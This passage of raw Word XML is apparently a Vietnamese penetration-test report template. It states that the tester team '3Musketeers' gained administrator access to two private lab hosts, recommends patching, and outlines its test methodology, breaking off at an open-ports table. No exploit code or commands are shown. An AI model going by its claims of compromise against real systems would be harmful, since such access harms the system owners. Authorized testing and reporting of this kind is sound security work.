          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trong quá trình kiểm thử, </w:t>
      </w:r>
      <w:r w:rsidR="008F34C9" w:rsidRPr="008F34C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>3Musketeers</w:t>
      </w:r>
      <w:r w:rsidR="008F34C9" w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C46508">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">có quyền truy cập cấp quản trị vào nhiều máy chủ trong hệ thống. Tất cả máy chủ đều được khai thác thành công và được cấp quyền truy cập. Các máy chủ mà </w:t>
      </w:r>
      <w:r w:rsidR="008F34C9" w:rsidRPr="008F34C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>3Musketeers</w:t>
      </w:r>
      <w:r w:rsidR="008F34C9" w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C46508">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>có thể truy cập vào được liệt kê dưới đây</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748E4F04" w14:textId="7A2DB858" w:rsidR="007C472A" w:rsidRDefault="007C472A" w:rsidP="007C472A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.19.115</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBDE66A" w14:textId="7A2DB858" w:rsidR="007C472A" w:rsidRPr="007C472A" w:rsidRDefault="007C472A" w:rsidP="007C472A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.19.116</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25900B7B" w14:textId="70E4B11E" w:rsidR="00A33DBB" w:rsidRPr="00784642" w:rsidRDefault="00FB3DFF" w:rsidP="00E06EDA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc57241312"/>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00784642" w:rsidRPr="00CC0D90">
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="002D6144">
        <w:t>Khuyến nghị bảo mật</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="40D881A5" w14:textId="70E4B11E" w:rsidR="008458C6" w:rsidRPr="00F043C0" w:rsidRDefault="008F34C9" w:rsidP="00505021">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F34C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>3Musketeers</w:t>
      </w:r>
      <w:r w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E3900">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>khuyến nghị vá các lỗ hổng được xác định trong quá trình kiểm thử để đảm bảo rằng tin tặc không thể khai thác các máy chủ này trong tương lai</w:t>
      </w:r>
      <w:r w:rsidR="00337F69" w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008E3900">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cần lưu ý rằng các máy chủ này cần được vá thường xuyên và nên duy trì chính sách kiểm tra, vá lỗi định kỳ để phát hiện và ngăn chặn các lỗ hổng mới xuất hiện trong tương lai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E78E10" w14:textId="70E4B11E" w:rsidR="00784642" w:rsidRPr="00D05018" w:rsidRDefault="00FB3DFF" w:rsidP="006156AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc57241313"/>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00784642" w:rsidRPr="00D05018">
        <w:t xml:space="preserve">.0 </w:t>
      </w:r>
      <w:r w:rsidR="008E3900">
        <w:t>Phương pháp kiểm thử</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="2841CF5C" w14:textId="70E4B11E" w:rsidR="00CF22AB" w:rsidRPr="00F043C0" w:rsidRDefault="008F34C9" w:rsidP="00505021">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F34C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>3Musketeers</w:t>
      </w:r>
      <w:r w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E3900" w:rsidRPr="008E3900">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">đã sử dụng </w:t>
      </w:r>
      <w:r w:rsidR="00431615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>các</w:t>
      </w:r>
      <w:r w:rsidR="008E3900" w:rsidRPr="008E3900">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> phương pháp được áp dụng rộng rãi </w:t>
      </w:r>
      <w:r w:rsidR="00431615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>để quá trình</w:t>
      </w:r>
      <w:r w:rsidR="008E3900" w:rsidRPr="008E3900">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kiểm tra thâm nhập </w:t>
      </w:r>
      <w:r w:rsidR="00431615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>đạt được tính</w:t>
      </w:r>
      <w:r w:rsidR="008E3900" w:rsidRPr="008E3900">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> hiệu quả trong việc kiểm tra mức độ an toàn của </w:t>
      </w:r>
      <w:r w:rsidR="00431615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>hệ thống CNTT của đơn vị</w:t>
      </w:r>
      <w:r w:rsidR="008E3900" w:rsidRPr="008E3900">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Dưới đây là sơ lược về cách </w:t>
      </w:r>
      <w:r w:rsidRPr="008F34C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>3Musketeers</w:t>
      </w:r>
      <w:r w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E3900" w:rsidRPr="008E3900">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">có thể xác định và khai thác nhiều loại </w:t>
      </w:r>
      <w:r w:rsidR="00431615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>máy chủ</w:t>
      </w:r>
      <w:r w:rsidR="008E3900" w:rsidRPr="008E3900">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> và bao gồm tất cả các lỗ hổng riêng lẻ được tìm thấy.</w:t>
      </w:r>
      <w:r w:rsidR="008E1C08" w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBCC433" w14:textId="70E4B11E" w:rsidR="004D636B" w:rsidRDefault="00842431" w:rsidP="00E06EDA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc57241314"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="004D636B" w:rsidRPr="00CC0D90">
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="00431615">
        <w:t>Thu thập thông tin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="07BFD92F" w14:textId="65F46C32" w:rsidR="00F11DFB" w:rsidRPr="00F043C0" w:rsidRDefault="00431615" w:rsidP="00505021">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Giai đoạn</w:t>
      </w:r>
      <w:r w:rsidRPr="00431615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thu thập thông tin của </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>quá trình kiểm thử</w:t>
      </w:r>
      <w:r w:rsidRPr="00431615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00431615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>âm nhập tập trung vào việc xác định phạm vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kiểm thử</w:t>
      </w:r>
      <w:r w:rsidRPr="00431615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Trong đợt kiểm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>thử x</w:t>
      </w:r>
      <w:r w:rsidRPr="00431615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">âm nhập này, </w:t>
      </w:r>
      <w:r w:rsidR="008F34C9" w:rsidRPr="008F34C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>3Musketeers</w:t>
      </w:r>
      <w:r w:rsidR="008F34C9" w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00431615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">được giao nhiệm vụ khai thác </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>vào các máy chủ với địa chỉ</w:t>
      </w:r>
      <w:r w:rsidRPr="00431615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP cụ thể là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FB8EE7" w14:textId="682A59FB" w:rsidR="003A70F8" w:rsidRDefault="00506871" w:rsidP="00505021">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Địa chỉ IP máy kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidR="00290984">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA621E9" w14:textId="3876201D" w:rsidR="003A70F8" w:rsidRPr="001170A9" w:rsidRDefault="00C46508" w:rsidP="00FE41FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001170A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>[Địa chỉ IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466FDA5C" w14:textId="7A2DB858" w:rsidR="003A70F8" w:rsidRDefault="00506871" w:rsidP="003A70F8">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Địa chỉ IP của máy nạn nhân</w:t>
      </w:r>
      <w:r w:rsidR="003A70F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7441BB40" w14:textId="7A2DB858" w:rsidR="007C472A" w:rsidRDefault="007C472A" w:rsidP="007C472A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.19.115</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177D1D81" w14:textId="7A2DB858" w:rsidR="007C472A" w:rsidRPr="007C472A" w:rsidRDefault="007C472A" w:rsidP="003A70F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.19.116</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB9B989" w14:textId="20346318" w:rsidR="004D636B" w:rsidRPr="00D05018" w:rsidRDefault="00842431" w:rsidP="00E06EDA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc57241315"/>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="004D636B" w:rsidRPr="00D05018">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D53F0C" w:rsidRPr="00D05018">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="004D636B" w:rsidRPr="00D05018">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00705F5A">
        <w:t>Kiểm thử xâm nhập</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="460F9410" w14:textId="488732DF" w:rsidR="00057330" w:rsidRPr="003C595E" w:rsidRDefault="00FE7D98" w:rsidP="003C595E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Giai đoạn kiểm thử xâm nhập</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7D98">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tập trung vào việc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>chiếm quyền kiểm soát vào nhiều loại máy chủ</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7D98">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>. Trong đợt kiểm t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>hử xâm</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7D98">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> nhập này, </w:t>
      </w:r>
      <w:r w:rsidR="007C472A" w:rsidRPr="008F34C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>3Musketeers</w:t>
      </w:r>
      <w:r w:rsidR="007C472A" w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7D98">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">đã có thể truy cập thành công vào </w:t>
      </w:r>
      <w:r w:rsidR="007C472A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7D98">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong số </w:t>
      </w:r>
      <w:r w:rsidR="007C472A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7D98">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002535F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>máy chủ</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7D98">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F15D10B" w14:textId="0D8427CC" w:rsidR="00EA28EC" w:rsidRPr="00FE140A" w:rsidRDefault="002F38E4" w:rsidP="00EA28EC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc57241316"/>
      <w:bookmarkStart w:id="6" w:name="_Toc22152532"/>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00EA28EC">
        <w:t xml:space="preserve">.2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00B31777">
        <w:t>Địa chỉ IP của máy tồn tại lỗ hổng</w:t>
      </w:r>
      <w:r w:rsidR="00EA28EC">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="2FC75C0A">
        <w:t>192.168.19.115</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="43016857" w14:textId="70F3E258" w:rsidR="00EA28EC" w:rsidRDefault="00D11294" w:rsidP="00EA28EC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="200" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc57241317"/>
      <w:r>
        <w:t>Thông tin dịch vụ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>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EA28EC" w14:paraId="38BABF9D" w14:textId="77777777" w:rsidTr="00842431">
        <w:trPr>
          <w:trHeight w:val="320"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3765" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="3D85C6"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="280CA72D" w14:textId="2AB6CBB2" w:rsidR="00EA28EC" w:rsidRDefault="001F3875" w:rsidP="001F3875">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Địa chỉ IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="3D85C6"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08762D76" w14:textId="2E5CDB3F" w:rsidR="00EA28EC" w:rsidRDefault="001F3875" w:rsidP="001F3875">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Các port đang mở</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA28EC" w14:paraId="19B58007" w14:textId="77777777" w:rsidTr="13C1602D">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3765" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="0000FF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F55C944" w14:textId="10265894" w:rsidR="00EA28EC" w:rsidRPr="00F17226" w:rsidRDefault="003406DA" w:rsidP="00842431">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.19.11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491730BC" w14:textId="57D1CD7C" w:rsidR="00EA28EC" w:rsidRPr="003E68BE" w:rsidRDefault="00EA28EC" w:rsidP="00842431">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:rPr>
